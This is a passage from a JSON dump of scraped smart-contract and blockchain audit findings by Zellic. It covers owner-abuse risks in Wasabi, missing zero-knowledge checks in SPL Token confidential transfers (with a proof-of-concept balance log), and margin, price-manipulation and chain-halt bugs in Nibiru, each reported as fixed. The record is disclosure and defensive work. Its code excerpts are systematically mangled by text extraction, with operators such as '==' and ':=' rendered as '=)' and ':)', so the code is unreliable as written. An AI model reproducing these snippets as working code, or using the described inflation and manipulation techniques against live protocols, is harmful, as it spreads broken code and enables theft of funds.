security, we recommend imple- menting measures to remove trust from the owner. Our recommendations are aimed at reducing centralization and increasing the resilience of the protocol. It\u2019s important to note that custody of private keys is crucial for maintaining control over the protocol. We recommend using a multisig wallet with multiple signers to enhance security. Zellic Wasab", + "labels": [ + "Zellic" + ], + "body": "3.5 Centralization risks In the following three findings, the audit has identified centralization risks that users of the protocol should be aware of. Although the impact of these risks is currently mitigated by Wasabi\u2019s role as the deployer and owner of the contracts, if the owner\u2019s keys were to be compromised or the owner becomes malicious, the impact on the protocol could be significant. To address this risk and increase user confidence and security, we recommend imple- menting measures to remove trust from the owner. Our recommendations are aimed at reducing centralization and increasing the resilience of the protocol. It\u2019s important to note that custody of private keys is crucial for maintaining control over the protocol. We recommend using a multisig wallet with multiple signers to enhance security. Zellic Wasabi", + "html_url": "https://github.com/Zellic/publications/blob/master/Wasabi - Zellic Audit Report.pdf" + }, + { + "title": "3.6 Factory update logic of option NFT enables owner to steal funds", + "labels": [ + "Zellic" + ], + "body": "Target: WasabiOption Category: Business Logic Likelihood: Low Severity: High : Low Each existing option corresponds to a WasabiOption NFT. For access control pur- poses, the contract stores the address of the corresponding WasabiPoolFactory. The factory provides an interface for pools to mint new option NFTs. However, it is impor- tant to note that the factory address can be upgraded in a way that allows the owner to potentially harm both individual option holders and all holders. Specifically, to remove existing positions, the owner can first call setFactory on the associated option NFT. This gives them access to the burn function: function burn(uint256 _optionId) external { require(msg.sender =) factory, \"Only the factory can burn tokens\"); _burn(_optionId); } After they burn a given option NFT, the owner can use setFactory to replace the cor- rect factory address and resume pool mechanics. When the owner burns option NFTs, it effectively denies their holders the right to exercise the option they purchased. Since ownership of these NFTs is checked during execution, it is crucial to ensure that the holder\u2019s rights are respected and they can exercise their options as intended. function validateOptionForExecution(uint256 _optionId, uint256 _tokenId) private { require(optionIds.contains(_optionId), \"WasabiPool: Option NFT doesn't belong to this pool\"); require(_msgSender() =) optionNFT.ownerOf(_optionId), \"WasabiPool: Only the token owner can execute the option\"); WasabiStructs.OptionData memory optionData = options[_optionId]; Zellic Wasabi require(optionData.expiry >) block.timestamp, \"WasabiPool: Option has expired\"); if (optionData.optionType =) WasabiStructs.OptionType.CALL) { validateAndWithdrawPayment(optionData.strikePrice, \"WasabiPool: Strike price needs to be supplied to execute a CALL option\"); } else if (optionData.optionType =) WasabiStructs.OptionType.PUT) { require(_msgSender() =) nft.ownerOf(_tokenId), \"WasabiPool: Need to own the token to sell in order to execute a PUT option\"); } } Further, the owner can prevent all holders from exercising options simply by fixing the factory address at a different value. Executing an option requires it to be successfully burned, and the factory loses the right to do so: function clearOption(uint256 _optionId, uint256 _tokenId, bool _executed) internal { WasabiStructs.OptionData memory optionData = options[_optionId]; if (optionData.optionType =) WasabiStructs.OptionType.CALL) { if (_executed) { /) Sell to executor, the validateOptionForExecution already checked if strike is paid nft.safeTransferFrom(address(this), _msgSender(), optionData.tokenId); tokenIds.remove(optionData.tokenId); } if (tokenIdToOptionId[optionData.tokenId] =) _optionId) { delete tokenIdToOptionId[optionData.tokenId]; } } else if (optionData.optionType =) WasabiStructs.OptionType.PUT) { if (_executed) { /) Buy from executor nft.safeTransferFrom(_msgSender(), address(this), _tokenId); payAddress(_msgSender(), optionData.strikePrice); } } options[_optionId].active = false; factory.burnOption(_optionId); } Zellic Wasabi We recommend that Wasabi implement one of the following solutions: Prevent factory upgrades in the WasabiOption NFT, or Support multiple factories, allowing them to be added but not removed. This would also require more granular access control (specifically, storing which NFTs a given factory is permitted to burn). This issue has been acknowledged by Wasabi, and a fix was implemented in commit 1aca0ac1. Zellic Wasabi", + "html_url": "https://github.com/Zellic/publications/blob/master/Wasabi - Zellic Audit Report.pdf" + }, + { + "title": "3.7 Pool toggling functionality may allow factory owner to lock exercising of options", + "labels": [ + "Zellic" + ], + "body": "Target: WasabiFactory Category: Business Logic Likelihood: Low Severity: High : Low The WasabiFactory contract allows its owner to toggle pools. function togglePool(address _poolAddress, bool _enabled) external onlyOwner { require(poolAddresses[_poolAddress] !) _enabled, 'Pool already in same state'); poolAddresses[_poolAddress] = _enabled; } This prevents them from burning options: function burnOption(uint256 _optionId) external { require(poolAddresses[msg.sender], \"Only enabled pools can burn options\"); options.burn(_optionId); } When pools are disabled, the existing options associated with those pools become unexercisable. This effectively allows the owner to prevent option holders from utiliz- ing the options they have purchased. Disabling pools is a reasonable functionality; however, it should not have an impact on the options that have already been issued. One possible solution would be to allow disabled pools to burn options but not mint new ones. Zellic Wasabi This issue has been acknowledged by Wasabi, and a fix was implemented in commit 28e1245c. Zellic Wasabi", + "html_url": "https://github.com/Zellic/publications/blob/master/Wasabi - Zellic Audit Report.pdf" + }, + { + "title": "3.1 Missing check in process_transfer leading to inflationary bug", + "labels": [ + "Zellic" + ], + "body": "Target: Confidential Transfer Extension Category: Coding Mistakes Likelihood: High Severity: Critical : Critical Transfers between confidential accounts require a zero knowledge (ZK) argument prov- ing that the source account balance is greater than the transferred amount and that the transferred amount is not negative. Confidential token transfer transactions consist of two instructions. The first required instruction contains a cryptographic ZK argument that proves the validity of the trans- fer without disclosing any information about the balances involved or the transferred amount. The other instruction performs the computations and updates the account state to actually perform the transfer. The ZK argument instruction is processed by a special built-in program that verifies its validity, reverting if validation fails. More specifically, the ZK argument is an equation in which some variables have values that correspond to the state of the accounts involved in the transaction. The other instruction is processed by the token program. The program verifies that the instruction containing the ZK argument exists and that its inputs are consistent with the state of the involved accounts, tying the ZK argument to the state of the blockchain. The token program does not correctly verify all the ZK argument inputs. One of the fields associated with the ZK argument, new_source_ciphertext, is ignored. This field contains the expected value of the source account encrypted balance after the trans- fer is performed. The lack of this check implies that the source account encrypted balance is not validated. This effectively decouples the ZK argument from the bal- ance of the source account. A malicious transaction constructed to exploit the issue allows to perform repeated transfers, totalling an amount bigger than the source account encrypted balance. We created a proof-of-concept exploit by constructing a transaction with multiple Zellic Solana Foundation instructions performing a transfer, all referencing the same instruction containing the ZK argument. The source account encrypted balance underflows and becomes invalid, but the des- tination account encrypted pending balance is credited multiple times, creating tokens out of nothing and inflating the supply. The supply inflation will not be reflected by the information stored in the mint account associated with the token. The destination account is able to apply the pending balance and make use of the unfairly obtained amount normally. The PoC would perform the following operations: [!] Starting double transfer PoC [!] Current balances: Alice: - available balance: 42 - pending balance: 0 Bob: - available balance: 0 - pending balance: 0 [!] Running malicious transaction. Instructions: - Instruction 0: TransferWithFeeData instruction - amount: 42 - Instruction 1: ConfidentialTransferInstruction:)Transfer instruction - Instruction 2: ConfidentialTransferInstruction:)Transfer instruction (repeated) [!] Current balances: Alice: could not decrypt balances Bob: - available balance: 0 - pending balance: 84 [!] Applying Bob pending balance [!] Current balances: Alice: could not decrypt balances Bob: - available balance: 84 - pending balance: 0 Zellic Solana Foundation Ensure that the source account encrypted balance corresponds to the expected amount contained in the ZK argument (the new_source_ciphertext field of the TransferData struct). The Solana Foundation team was alerted of this finding while the audit was ongo- ing. The team quickly confirmed the issue and submitted a remediation patch for our review. The patch correctly implements the suggested remediation. Pull request #3867 fixes the issue following our recommendation. The PR head com- mit c7fbd4b was merged in the master branch on December 3, 2022. The confidential token transfer extension was not used at the time the audit was con- ducted; therefore, no funds were at risk. Zellic Solana Foundation", + "html_url": "https://github.com/Zellic/publications/blob/master/SPL Token - Zellic Audit Report.pdf" + }, + { + "title": "3.2 Missing check in process_withdraw potentially leading to in- flationary bug", + "labels": [ + "Zellic" + ], + "body": "Target: Confidential Transfer Extension Category: Coding Mistakes Likelihood: High Severity: Critical : Critical Withdrawals from a token account confidential balance to its cleartext balance require a zero knowledge (ZK) argument that proves that the account encrypted balance is greater than the withdrawn amount. Confidential withdraw transactions consist of two instructions. One contains the afore- mentioned ZK argument and is processed by a special built-in program that verifies its validity, reverting the transaction in case of failure. The other instruction, processed by SPL Token 2022, performs the operations on the balances to actually accomplish the withdrawal. The token program verifies that the instruction containing the ZK ar- gument exists and that its inputs are consistent with the state of the involved accounts, tying the ZK argument to the state of the blockchain. The token program does not correctly verify that the public key associated with the ZK argument corresponds to the public key associated to the source account encrypted balance. This potentially allows an attacker to forge a ZK argument asserting the va- lidity of any desired withdrawal amount, regardless of the actual encrypted balance of the source account. Refer to 5 for more information on the equations implementing the ZK argument. An attacker might be able to exploit this issue and withdraw an arbitrary amount of tokens to their cleartext balance, creating tokens from nothing and inflating the supply. Note that the supply inflation will not be reflected by the information stored in the mint account associated with the token. The plaintext balance is spendable, exactly like any other regular plaintext balance on a legitimate account. We did not fully confirm exploitability of this issue, but the team agreed that it is likely possible to forge a malicious ZK equality argument. Zellic Solana Foundation Ensure that the public key associated with the source account corresponds to the pub- lic key associated with the ZK argument (the pubkey field of the WithdrawData struct). The Solana Foundation team was alerted of this finding while the audit was ongoing. The team quickly helped confirm the issue. Pull request #3768 fixes the issue following our recommendation. The PR head com- mit 94b912a was merged in the master branch on October 27, 2022. The confidential token transfer extension was not used at the time the audit was con- ducted; therefore, funds were not at risk. Zellic Solana Foundation", + "html_url": "https://github.com/Zellic/publications/blob/master/SPL Token - Zellic Audit Report.pdf" + }, + { + "title": "3.3 Missing public key check in EmptyAccount leading to defla- tionary bug", + "labels": [ + "Zellic" + ], + "body": "Target: Confidential Transfer Extension Category: Coding Mistakes Likelihood: Low Severity: High : Low A token account can only be closed if it has a zero balance. This applies to the regu- lar cleartext balance as well as to the balances managed by the confidential transfer extension. Since the latter balances are encrypted, a special instruction called Empt yAccount has to be executed before closing the account, which enables closing the account after verifying a zero knowledge (ZK) argument that proves the account bal- ance is zero. Similarly to other confidential token operations, a ZK argument has to be embedded in an instruction in the same transaction that invokes EmptyAccount. The processor for EmptyAccount verifies that the ZK argument exists and that it is correctly tied to the current state of the blockchain. The function processing the EmptyAccount instruction does not check that the pub- lic key associated with the ZK argument corresponds to the public key of the token account to be closed. This might allow an attacker to forge a ZK argument, falsely showing the account balance to be zero. By closing an account with a nonzero balance, an attacker would be able to decrease the circulating supply without causing an update to the supply information stored in the mint account. The attacker would have to give up their balance; therefore, it is difficult to imagine an incentive to perform such an attack. Furthermore, the same effect could be obtained by simply keeping the tokens in the attacker\u2019s account. For this reason, this issue is classified as low likelihood and low impact. Ensure that the public key associated with the proof corresponds to the public key of the account being closed. Zellic Solana Foundation Pull request #3767 fixes the issue following our recommendation. The PR head com- mit d6a72eb was merged in the master branch on October 27, 2022. Zellic Solana Foundation", + "html_url": "https://github.com/Zellic/publications/blob/master/SPL Token - Zellic Audit Report.pdf" + }, + { + "title": "3.4 Confidential transfer amounts information leak via transfer fees", + "labels": [ + "Zellic" + ], + "body": "Target: Confidential Transfer Extension Category: Business Logic Likelihood: N/A Severity: Low : Low Tokens managed by SPL Token 2022 can be configured to require a transfer fee con- sisting of a percentage of the transferred amount (with the possibility to cap the max- imum fee at a fixed amount). This configuration also applies to confidential transfers, relying on zero-knowledge cryptographic arguments to prove the validity of the en- crypted balances being manipulated. Information about the value of every transfer is leaked to the owner of the keys con- trolling the transfer fees for the mint. The owner of the private key associated with management of the transfer fees can gather information on the value of confidential transfers. Since the key is able to de- crypt the fee balance before and after the transfer has occurred, the fee amount for every transfer can be obtained. If the fee is lower than the cap amount, then the exact transferred amount can be inferred. Otherwise, the transferred amount is guaranteed to be at least as big as the minimum amount that would require the maximum fee. Completely blinding the transfer fee amounts appears to be challenging and likely to require a significant engineering effort. If this information leak is accepted, we suggest to inform SPL token developers and users of this privacy pitfall of confidential transfers involving fees. Pull request #3773 addresses the issue by adding more documentation on the confi- dential transfer extension code, acknowledging the potential information leak if a con- fidential transfer with fees is performed. The PR head commit 1c3af5e was merged in the master branch on October 28, 2022. Zellic Solana Foundation", + "html_url": "https://github.com/Zellic/publications/blob/master/SPL Token - Zellic Audit Report.pdf" + }, + { + "title": "3.5 Confidential transfer fees\u2019 withdrawal instructions ignore constraints", + "labels": [ + "Zellic" + ], + "body": "Target: Confidential Transfer Extension Category: Coding Mistakes Likelihood: Low Severity: Low : Low The functions handling the confidential transfer instructions WithdrawWithheldTokensF romAccounts and WithdrawWithheldTokensFromMint ignore some of the restrictions that can be applied to confidential token accounts: allow_balance_credits: An account can be configured to deny credits to its pending balance. pending_balance_credit_counter: This value should be checked not to be greater than maximum_pending_balance_credit_counter. The instructions also do not in- crement pending_balance_credit_counter. We note that these instructions directly add the entire value of the withheld balance to the pending_balance_lo of the destination account. This could potentially cause the pending balance to become bigger than 216 or even 232, making decryption of the balance difficult. An attacker with control of the keys trusted with managing transfer fees could credit the encrypted pending balance of an account bypassing the configuration applied by the account owner and potentially make it difficult for the victim to decrypt the en- crypted balance. Revert the transaction if allow_balance_credits is set on the destination ac- count. Revert the transaction if pending_balance_credit_counter is not less than maxim um_pending_balance_credit_counter. Increment pending_balance_credit_count er after the transfer taken place. Since the value of the transferred balances is encrypted, limiting the transferred value to avoid overflowing the soft amount of 232 is challenging and would require extensive modifications. Zellic Solana Foundation Pull request #3774 fixes the issue following our recommendation. The PR head commit 16384e2 was merged in the master branch on October 28, 2022. The confidential token transfer extension was not used at the time the audit was con- ducted; therefore, funds were not at risk. Zellic Solana Foundation", + "html_url": "https://github.com/Zellic/publications/blob/master/SPL Token - Zellic Audit Report.pdf" + }, + { + "title": "5.1 Margin ratio not checked when removing collateral", + "labels": [ + "Zellic" + ], + "body": "Target: x/perp/v2/keeper/margin.go Category: Coding Mistakes Likelihood: High Severity: Critical : Critical When removing margin from a position using RemoveMargin, there is a check to ensure that there is enough free collateral: func (k Keeper) RemoveMargin( ctx sdk.Context, pair asset.Pair, traderAddr sdk.AccAddress, marginToRemove sdk.Coin, ) (res *v2types.MsgRemoveMarginResponse, err error) { /) fetch objects from state market, err :) k.Markets.Get(ctx, pair) if err !) nil { return nil, fmt.Errorf(\u201d%w: %s\u201d, types.ErrPairNotFound, pair) } amm, err :) k.AMMs.Get(ctx, pair) if err !) nil { return nil, fmt.Errorf(\u201d%w: %s\u201d, types.ErrPairNotFound, pair) } if marginToRemove.Denom !) amm.Pair.QuoteDenom() { return nil, fmt.Errorf(\u201dinvalid margin denom: %s\u201d, marginToRemove.Denom) } position, err :) k.Positions.Get(ctx, collections.Join(pair, traderAddr)) if err !) nil { return nil, err } /) ensure we have enough free collateral Zellic Nibiru spotNotional, err :) PositionNotionalSpot(amm, position) if err !) nil { return nil, err } twapNotional, err :) k.PositionNotionalTWAP(ctx, position, market.TwapLookbackWindow) if err !) nil { return nil, err } minPositionNotional :) sdk.MinDec(spotNotional, twapNotional) /) account for funding payment fundingPayment :) FundingPayment(position, market.LatestCumulativePremiumFraction) remainingMargin :) position.Margin.Sub(fundingPayment) /) account for negative PnL unrealizedPnl :) UnrealizedPnl(position, minPositionNotional) if unrealizedPnl.IsNegative() { remainingMargin = remainingMargin.Add(unrealizedPnl) } if remainingMargin.LT(marginToRemove.Amount.ToDec()) { return nil, types.ErrFailedRemoveMarginCanCauseBadDebt.Wrapf( \u201dnot enough free collateral to remove margin; remainingMargin %s, marginToRemove %s\u201d, remainingMargin, marginToRemove, ) } if err = k.Withdraw(ctx, market, traderAddr, marginToRemove.Amount); err !) nil { return nil, err } The issue is that there is no check to ensure that the new margin ratio of the position is valid and that it is not underwater. This allows someone to open a new position and then immediately remove 99.99% of the margin while effectively allowing them to have infinite leverage. Zellic Nibiru There should be a check on the margin ratio, similar to afterPositionUpdate, to ensure that it is not too low: var preferredPositionNotional sdk.Dec if positionResp.Position.Size_.IsPositive() { preferredPositionNotional = sdk.MaxDec(spotNotional, twapNotional) } else { preferredPositionNotional = sdk.MinDec(spotNotional, twapNotional) } marginRatio :) MarginRatio(*positionResp.Position, preferredPositionNotional, market.LatestCumulativePremiumFraction) if marginRatio.LT(market.MaintenanceMarginRatio) { return v2types.ErrMarginRatioTooLow } This issue has been acknowledged by Nibiru, and a fix was implemented in commit ffad80c2. Zellic Nibiru", + "html_url": "https://github.com/Zellic/publications/blob/master/Nibiru - Zellic Audit Report.pdf" + }, + { + "title": "5.2 AMM price manipulation using openReversePosition", + "labels": [ + "Zellic" + ], + "body": "Target: x/perp/v2/keeper Category: Coding Mistakes Likelihood: High Severity: Critical : Critical The Nibiru perp module allows users to open reverse positions to decrease the mar- gin, effectively shrinking the position size. A user can open a buy position and then immediately open a reverse position of the same size. Since currentPositionNotional is fractionally larger than notionalToDecreaseBy, it is possible to enter the decreasePo stion flow as follows: if currentPositionNotional.GT(notionalToDecreaseBy) { /) position reduction return k.decreasePosition( ctx, market, amm, currentPosition, notionalToDecreaseBy, baseAmtLimit, /) skipFluctuationLimitCheck *) false, This leaves the position with a zero size. Further in afterPositionUpdate, the position is not saved due to the following check: func (k Keeper) afterPositionUpdate( ctx sdk.Context, market v2types.Market, amm v2types.AMM, traderAddr sdk.AccAddress, positionResp v2types.PositionResp, ) (err error) { [...))] if !positionResp.Position.Size_.IsZero() { k.Positions.Insert(ctx, collections.Join(market.Pair, traderAddr), *positionResp.Position) } Zellic Nibiru However, the AMM is still updated in decreasePosition as though the position was saved. func (k Keeper) decreasePosition( ctx sdk.Context, market v2types.Market, amm v2types.AMM, currentPosition v2types.Position, decreasedNotional sdk.Dec, baseAmtLimit sdk.Dec, skipFluctuationLimitCheck bool, ) (updatedAMM *v2types.AMM, positionResp *v2types.PositionResp, err error) { [...))] updatedAMM, baseAssetDeltaAbs, err :) k.SwapQuoteAsset( ctx, market, amm, dir, decreasedNotional, baseAmtLimit, ) An attacker could repeatedly open and close positions to manipulate the AMM price. They could then liquidate strong positions to make a profit. It appears that the afterPositionUpdate function does not update a position with size zero because it assumes that it has already been deleted \u2014 for example in closePosi tionEntirely: positionResp.ExchangedNotionalValue = exchangedNotionalValue positionResp.Position = &v2types.Position{ TraderAddress: currentPosition.TraderAddress, Pair: currentPosition.Pair, Size_: sdk.ZeroDec(), Margin: sdk.ZeroDec(), OpenNotional: sdk.ZeroDec(), Zellic Nibiru LatestCumulativePremiumFraction: market.LatestCumulativePremiumFraction, LastUpdatedBlockNumber: ctx.BlockHeight(), } err = k.Positions.Delete(ctx, collections.Join(currentPosition.Pair, trader)) Instead, a flag could be added to the PositionResp type to avoid updating a position after it has been deleted. This issue has been acknowledged by Nibiru, and fixes were implemented in the fol- lowing commits: ffad80c2 d47861fd Zellic Nibiru", + "html_url": "https://github.com/Zellic/publications/blob/master/Nibiru - Zellic Audit Report.pdf" + }, + { + "title": "5.3 The sender is not checked for Wasm messages", + "labels": [ + "Zellic" + ], + "body": "Target: x/wasm/binding/exec.go Category: Coding Mistakes Likelihood: High Severity: Critical : Critical The CosmosWasm module has been enabled to allow developers to deploy smart contracts on Nibiru. To allow these contracts to interact with the chain, a custom ex- ecutor has been written that will intercept and execute the appropriate custom calls: type OpenPosition struct { Sender string `json:\u201dsender\u201d` Pair string `json:\u201dpair\u201d` IsLong bool QuoteAmount sdk.Int `json:\u201dquote_amount\u201d` Leverage sdk.Dec `json:\u201dleverage\u201d` BaseAmountLimit sdk.Int `json:\u201dbase_amount_limit\u201d` `json:\u201dis_long\u201d` } /) DispatchMsg encodes the wasmVM message and dispatches it. func (messenger *CustomWasmExecutor) DispatchMsg( ctx sdk.Context, contractAddr sdk.AccAddress, contractIBCPortID string, wasmMsg wasmvmtypes.CosmosMsg, ) (events []sdk.Event, data [][]byte, err error) { /) If the \u201dCustom\u201d field is set, we handle a BindingMsg. if wasmMsg.Custom !) nil { var contractExecuteMsg BindingExecuteMsgWrapper if err :) json.Unmarshal(wasmMsg.Custom, &contractExecuteMsg); err !) nil { return events, data, sdkerrors.Wrapf(err, \u201dwasmMsg: %s\u201d, wasmMsg.Custom) } switch { /) Perp module case contractExecuteMsg.ExecuteMsg.OpenPosition !) nil: cwMsg :) contractExecuteMsg.ExecuteMsg.OpenPosition Zellic Nibiru _, err = messenger.Perp.OpenPosition(cwMsg, ctx) return events, data, err ...)) These can then be called from a Cosmos contract: ///)) NibiruExecuteMsg is an override of CosmosMsg:)Custom. Using this msg ///)) wrapper for the ExecuteMsg handlers show that their return values are valid ///)) instances of CosmosMsg:)Custom in a type-safe manner. It also shows how ///)) ExecuteMsg can be extended in the contract. #)cw_serde] #)cw_custom] pub struct NibiruExecuteMsg { pub route: NibiruRoute, pub msg: ExecuteMsg, } pub fn open_position( sender: String, pair: String, is_long: bool, quote_amount: Uint128, leverage: Decimal, base_amount_limit: Uint128, ) -> CosmosMsg { NibiruExecuteMsg { route: NibiruRoute:)Perp, msg: ExecuteMsg:)OpenPosition { sender, pair, is_long, quote_amount, leverage, base_amount_limit, }, } .into() } Zellic Nibiru The issue is that there is no validation on the value of sender; it can be set to an arbitrary account and end up being sent straight to the message handler: func (exec *ExecutorPerp) OpenPosition( cwMsg *cw_struct.OpenPosition, ctx sdk.Context, ) ( ) { sdkResp *perpv2types.MsgOpenPositionResponse, err error, if cwMsg =) nil { return sdkResp, wasmvmtypes.InvalidRequest{Err: \u201dnull open position msg\u201d} } pair, err :) asset.TryNewPair(cwMsg.Pair) if err !) nil { return sdkResp, err } var side perpv2types.Direction if cwMsg.IsLong { side = perpv2types.Direction_LONG } else { side = perpv2types.Direction_SHORT } sdkMsg :) &perpv2types.MsgOpenPosition{ Sender: cwMsg.Sender, Pair: pair, Side: side, QuoteAssetAmount: cwMsg.QuoteAmount, Leverage: cwMsg.Leverage, BaseAssetAmountLimit: cwMsg.BaseAmountLimit, } goCtx :) sdk.WrapSDKContext(ctx) return exec.MsgServer().OpenPosition(goCtx, sdkMsg) } Zellic Nibiru This allows a CosmosWasm contract to execute the OpenPosition, ClosePosition, Ad dMargin, and RemoveMargin operations on behalf of any user. The sender should not be able to be arbitrarily set; it should be the address of the contract that is executing the message. If the sender needs to be configurable, only a whitelisted or trusted contract should be able to do it and that contract should have the appropriate checks to ensure the sender is set to the correct value. This issue has been acknowledged by Nibiru, and fixes were implemented in the fol- lowing commits: bb898ae9 75041c3d Zellic Nibiru", + "html_url": "https://github.com/Zellic/publications/blob/master/Nibiru - Zellic Audit Report.pdf" + }, + { + "title": "5.4 Wasm bindings do not validate messages", + "labels": [ + "Zellic" + ], + "body": "Target: x/wasm/binding/exec.go Category: Coding Mistakes Likelihood: High Severity: Critical : Critical It was found that the Wasm bindings use messages directly after they are unmar- shalled without calling ValidateBasic. The messages are directly passed to the han- dlers and crucial checks are skipped. func (messenger *CustomWasmExecutor) DispatchMsg( ctx sdk.Context, contractAddr sdk.AccAddress, contractIBCPortID string, wasmMsg wasmvmtypes.CosmosMsg, ) (events []sdk.Event, data [][]byte, err error) { /) If the \u201dCustom\u201d field is set, we handle a BindingMsg. if wasmMsg.Custom !) nil { var contractExecuteMsg BindingExecuteMsgWrapper if err :) json.Unmarshal(wasmMsg.Custom, &contractExecuteMsg); err !) nil { return events, data, sdkerrors.Wrapf(err, \u201dwasmMsg: %s\u201d, wasmMsg.Custom) } switch { /) Perp module case contractExecuteMsg.ExecuteMsg.OpenPosition !) nil: cwMsg :) contractExecuteMsg.ExecuteMsg.OpenPosition _, err = messenger.Perp.OpenPosition(cwMsg, ctx) Any checks that the handlers rely on ValidateBasic for are skipped and can be ex- ploited if the respective checks are not present in the handlers. The following are the examples of messages that can be exploited: Zellic Nibiru For one, ExecuteMsg.AddMargin does not check if the margin denom is the same as the pair denom. This could allow incorrect collateral to be used. Another is that ExecuteMsg.RemoveMargin does not check that the amount to re- move is positive, allowing the margin of a position to be increased without trans- ferring any funds from the user. The inflated marging could then be withrawn to drain the VaultModuleAccount and PerpEFModuleAccount pools. After creating each sdkMsg, the ValidateBasic() should be called on each before they are passed to the MsgServer in the executor. This issue has been acknowledged by Nibiru, and fixes were implemented in the fol- lowing commits: ba58517e da51fdf0 Zellic Nibiru", + "html_url": "https://github.com/Zellic/publications/blob/master/Nibiru - Zellic Audit Report.pdf" + }, + { + "title": "5.5 Incorrect TWAP calculation", + "labels": [ + "Zellic" + ], + "body": "Target: x/oracle/keeper/keeper.go Category: Coding Mistakes Likelihood: High Severity: High : High The oracle module uses the calcTwap to compute the TWAP (time-weighted average price). Here, the maximum of snapshots[0].TimestampMs and ctx.BlockTime().UnixM illi() - twapLookBack is used as firstTimeStamp. func (k Keeper) calcTwap(ctx sdk.Context, snapshots []types.PriceSnapshot) (price sdk.Dec, err error) { [...))] firstTimeStamp :) ctx.BlockTime().UnixMilli() - twapLookBack cumulativePrice :) sdk.ZeroDec() firstTimeStamp = math.MaxInt64(snapshots[0].TimestampMs, firstTimeStamp) [...))] } nextTimestampMs = snapshots[i+1].TimestampMs price :) s.Price.MulInt64(nextTimestampMs - timestampStart) This is not sound as it is possible for the price to be negative if timestampStart is greater than nextTimestampMs. If timestampStart is greater than nextTimestampMs, the resulting TWAP data will be incorrect. However, this is not an issue currently since the caller for calcTwap only includes snapshots starting from ctx.BlockTime().UnixMilli() - twapLookBack. Ideally, firstTimeStamp should always just be equal to the timestamp of the first snap- shot. Zellic Nibiru This issue has been acknowledged by Nibiru, and a fix was implemented in commit 53487734. Zellic Nibiru", + "html_url": "https://github.com/Zellic/publications/blob/master/Nibiru - Zellic Audit Report.pdf" + }, + { + "title": "5.6 Panic in EndBlock hooks will halt the chain", + "labels": [ + "Zellic" + ], + "body": "Target: x/inflation, x/oracle Category: Coding Mistakes Likelihood: High Severity: High : High When executing a transaction, Cosmos automatically handles any panics that may occur with the default recovery middleware (see runtx_middleware), but this is not the case for anything that runs within an EndBlock or BeginBlock hook. In these cases it is vital that there are no panics and that all errors are handled correctly; otherwise, it will result in a chain halt as all the validators will panic and crash. The following locations are all reachable from an EndBlock or BeginBlock (AfterEpoch End is called from a BeginBlock): x/inflation/keeper/hooks.go#L64-L64 x/oracle/keeper/slash.go#L52-L52 x/oracle/keeper/update_exchange_rates.go#L80-L80 x/oracle/keeper/reward.go#L71-L71 x/oracle/keeper/reward.go#L60-L60 x/oracle/keeper/ballot.go#L69-L69 x/oracle/types/ballot.go#L111-L111 If any of these error conditions are met, there will be a chain halt as all the validators will crash. The panics should be replaced with the appropriate error handling for each case and either log the error or fail gracefully. This issue has been acknowledged by Nibiru, and fixes were implemented in the fol- lowing commits: 73d9bfd4 85859f2b Zellic Nibiru", + "html_url": "https://github.com/Zellic/publications/blob/master/Nibiru - Zellic Audit Report.pdf" + }, + { + "title": "5.7 The ReserveSnapshots are never updated", + "labels": [ + "Zellic" + ], + "body": "Target: x/perp/v2/module/abci.go Category: Coding Mistakes Likelihood: High Severity: High : High The perp module has an EndBlocker, which is designed to create a snapshot of the AMM in order to calculate the TWAP prices: /) EndBlocker Called every block to store a snapshot of the perpamm. func EndBlocker(ctx sdk.Context, k keeper.Keeper) []abci.ValidatorUpdate { for _, amm :) range k.AMMs.Iterate(ctx, collections.Range[asset.Pair]{}).Values() { snapshot :) types.ReserveSnapshot{ Amm: amm, TimestampMs: ctx.BlockTime().UnixMilli(), } k.ReserveSnapshots.Insert(ctx, collections.Join(amm.Pair, ctx.BlockTime()), snapshot) } return []abci.ValidatorUpdate{} } The issue is that the EndBlocker is not hooked up and is never called. The ReserveSnapshots are never updated and so anything relying on it (such as CalcT wap) will be using whatever values were set during genesis. The EndBlocker should be called from the perp module\u2019s EndBlock: func (am AppModule) EndBlock(ctx sdk.Context, _ abci.RequestEndBlock) []abci.ValidatorUpdate { EndBlocker(ctx, am.keeper) return []abci.ValidatorUpdate{} } Zellic Nibiru This issue has been acknowledged by Nibiru, and a fix was implemented in commit 7144cc96. Zellic Nibiru", + "html_url": "https://github.com/Zellic/publications/blob/master/Nibiru - Zellic Audit Report.pdf" + }, + { + "title": "5.8 Distributing zero coins causes chain halt", + "labels": [ + "Zellic" + ], + "body": "Target: x/oracle/keeper/hooks.go Category: Coding Mistakes Likelihood: High Severity: High : High The oracle module uses an AfterEpochEnd hook, which allocates rewards for valida- tors. This hook is inside the BeginBlocker. func (h Hooks) AfterEpochEnd(ctx sdk.Context, epochIdentifier string, _ uint64) { [...))] balances :) h.bankKeeper.GetAllBalances(ctx, account.GetAddress()) for _, balance :) range balances { validatorFees :) balance.Amount.ToDec().Mul(params.ValidatorFeeRatio).TruncateInt() rest :) balance.Amount.Sub(validatorFees) totalValidatorFees = append(totalValidatorFees, sdk.NewCoin(balance.Denom, validatorFees)) totalRest = append(totalRest, sdk.NewCoin(balance.Denom, rest)) } [...))] err = h.k.AllocateRewards( ctx, perptypes.FeePoolModuleAccount, totalValidatorFees, 1, ) if err !) nil { panic(err) } The issue here is that validatorFees could be zero for very small positions. This means AllocateRewards could be called with one or more coins with a zero amount. Zellic Nibiru The AllocateRewards function in turn calls bankKeeper.SendCoinsFromModuleToModule, which will fail if any of the coins have a nonpositive amount. func (coins Coins) Validate() error { [...))] if err :) ValidateDenom(coins[0].Denom); err !) nil { return err } if !coins[0].IsPositive() { return fmt.Errorf(\u201dcoin %s amount is not positive\u201d, coins[0]) } Since the AfterEpochEnd hook is inside the BeginBlocker, this will cause the chain to halt. If the final value of totalValidatorFees is not greater than zero then the call to h.k.Al locateRewards should not be made. This issue has been acknowledged by Nibiru, and a fix was implemented in commit c430556a. Zellic Nibiru", + "html_url": "https://github.com/Zellic/publications/blob/master/Nibiru - Zellic Audit Report.pdf" + }, + { + "title": "5.9 Large rewardSpread due to miscalculation", + "labels": [ + "Zellic" + ], + "body": "Target: x/oracle/types/ballot.go Category: Coding Mistakes Likelihood: Medium Severity: High : Medium The oracle module uses the rewardSpread to check if the price data from the validator is within an acceptable range from the chosen price. func Tally(ballots types.ExchangeRateBallots, rewardBand sdk.Dec, validatorPerformances types.ValidatorPerformances) sdk.Dec { sort.Sort(ballots) weightedMedian :) ballots.WeightedMedianWithAssertion() standardDeviation :) ballots.StandardDeviation(weightedMedian) rewardSpread :) weightedMedian.Mul(rewardBand.QuoInt64(2)) if standardDeviation.GT(rewardSpread) { rewardSpread = standardDeviation sum :) sdk.ZeroDec() for _, v :) range pb { deviation 